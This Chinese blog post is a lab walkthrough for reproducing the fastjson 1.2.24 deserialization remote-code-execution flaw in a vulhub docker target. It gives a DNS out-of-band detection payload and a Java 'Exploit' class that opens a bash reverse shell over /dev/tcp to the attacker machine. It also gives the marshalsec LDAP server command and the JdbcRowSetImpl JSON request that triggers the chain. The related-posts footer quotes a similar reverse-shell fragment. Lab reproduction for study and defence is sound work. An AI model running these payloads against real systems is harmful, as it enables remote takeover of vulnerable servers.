fastjson1.2.24-RCE漏洞复现

于 2024-03-15 12:17:10 发布
阅读量888 收藏 21
点赞数 36
分类专栏: 漏洞复现 文章标签: json java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/three_1996/article/details/136736124
版权

触发过程图

靶场模拟

1、实验环境准备

攻击者

kali(192.168.101.141)

使用工具:marshalsec-0.0.3-SNAPSHOT-all.jar

GitHub - RandomRobbieBF/marshalsec-jar: marshalsec-0.0.3-SNAPSHOT-all compiled on X64

被攻击者

centos7(192.168.101.148)

使用工具:docker

docker-compose

vulhub/fastjson1.2.24-rce

centos进入fastjson/1.2.24-rce目录,开启docker-compose服务,默认开启8090端口

启动环境后访问成功

2、检测服务是否存在漏洞(dig.pm验证)

访问服务并抓包,获取请求信息,对其进行修改:

请求修改为:POST

请求头添加:

Content-Type:application/json

请求体添加:

{"zeo":{"@type":"java.net.Inet4Address","val":"6666.8fd20ae815.ipv6.1433.eu.org."}}

修改请求、验证存在dns带外漏洞

POST / HTTP/1.1

Host: 192.168.101.148:8090

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type:application/json

DNT: 1

Connection: close

Content-Length: 83

{"zeo":{"@type":"java.net.Inet4Address","val":"6666.8fd20ae815.ipv6.1433.eu.org."}}

可以看到有回显的内容,证明存在漏洞利用。

3、漏洞利用

1、构造反弹shell的java代码

运行后,得到Exploit.class文件

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit {
public Exploit()throws Exception{
Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/192.168.101.141/6666 0>&1"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));

String line;
while ((line = reader.readLine()) != null){
System.out.println(line);
}

p.waitFor();
is.close();
reader.close();
p.destroy();
}

public static void main(String[] args) {

}
}

2、将文件发送到攻击机,并开放文件共享,默认开启8000端口

3、攻击机开启LDAP服务器,监听8888端口

kali进入marshalsec-jar-master目录,开启LDAP服务器,让centos来远程启动http.server的Exploit文件,并开启8888监听端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.101.141:8000/#Exploit 8888

4、攻击机开启监听,监听我们构造的java反弹shell

5、修改抓包的请求信息

根据上述fastjson源代码信息收集到的信息,进行修改请求

修改请求信息

POST / HTTP/1.1

Host: 192.168.101.148:8090

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type:application/json

DNT: 1

Connection: close

{

"a":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"ldap://192.168.101.141:8888/Exploit",

"autoCommit":true

}

}

6、发送请求即可获得反馈

(1)LDAP服务器监听、收到请求

(2)http.server收到get请求

(3)监听反弹shell,上线成功

three_1996
关注
  • 36
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 379
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
Fastjson 1.2.24漏洞搭建及复现——详解
最新发布
网安小白的博客
08-02 798
反序列化Fastjson1.2.24漏洞复现全过程,图文详解,包含复现过程中出现各种问题~
Fastjson1.2.24RCE漏洞复现
L1928的博客
05-18 809
1.启动环境并且访问 2.下载marshalsec-0.0.3-SNAPSHOT-all.jar 3.新建Shell.java文件 import java.lang.Runtime; import java.lang.Process; public class shell{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.
marshalsec-0.0.3-SNAPSHOT-all.jar
12-14
marshalsec-0.0.3-SNAPSHOT-all.jar,渗透测试
java 反序列化利用工具 marshalsec 使用简介
热门推荐
whatday的专栏
08-11 2万+
命令格式 marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, Spri
【vulhub漏洞复现Fastjson 1.2.47 反序列化漏洞复现
一剑开天门!的博客
02-17 1970
【vulhub漏洞复现Fastjson 1.2.47 反序列化漏洞复现
java 开源项目marshalsec,快速搭建jndi相关server,目前实现了ldap,rmi。
FREEDOM
12-11 1817
开源项目的git代码地址:GitHub - mbechler/marshalsec 编译 这里跳过编译时的test mvn "-Dmaven.test.skip=true" -P clean package 编译后target目录 演示如何启动ldap服务 上传编译后的class文件到http服务器 把Exploit.class文件放在http服务器上,这里使用nginx服务器,访问地址为http://127.0.0.1/test/Exploit.class. 启动ldap...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode, 展示生成的payloads gadget_type:指定使用的payload arguments - payload运行时使用的参数 marshalsec.<marshaller>:指定exploits,根目录下的java文件名
fastjson-1.2.24
09-22
JSON4J-1.0 IBM JSON4J 类型是受支持的实体类型。JSON4J 库包含在该产品的运行时环境中。您无需捆绑任何附加的库。
fastjson-1.2.54-API文档-中文版.zip
07-09
赠送jar包:fastjson-1.2.54.jar; 赠送原API文档:fastjson-1.2.54-javadoc.jar; 赠送源代码:fastjson-1.2.54-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.54.pom; 包含翻译后的API文档:fastjson-...
FastJson反序列化漏洞复现
小赵同学的博客
07-29 3757
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
fastjson1.2.24rce漏洞复现
06-06
fastjson1.2.24rce漏洞是一种Java反序列化漏洞,攻击者可以通过构造恶意的JSON数据包,触发目标服务器上的fastjson库反序列化漏洞,从而实现远程代码执行。该漏洞存在于fastjson 1.2.24及之前版本中,已经被修复。如果您使用的是fastjson 1.2.24及之前版本,请及时升级到最新版本以避免被攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值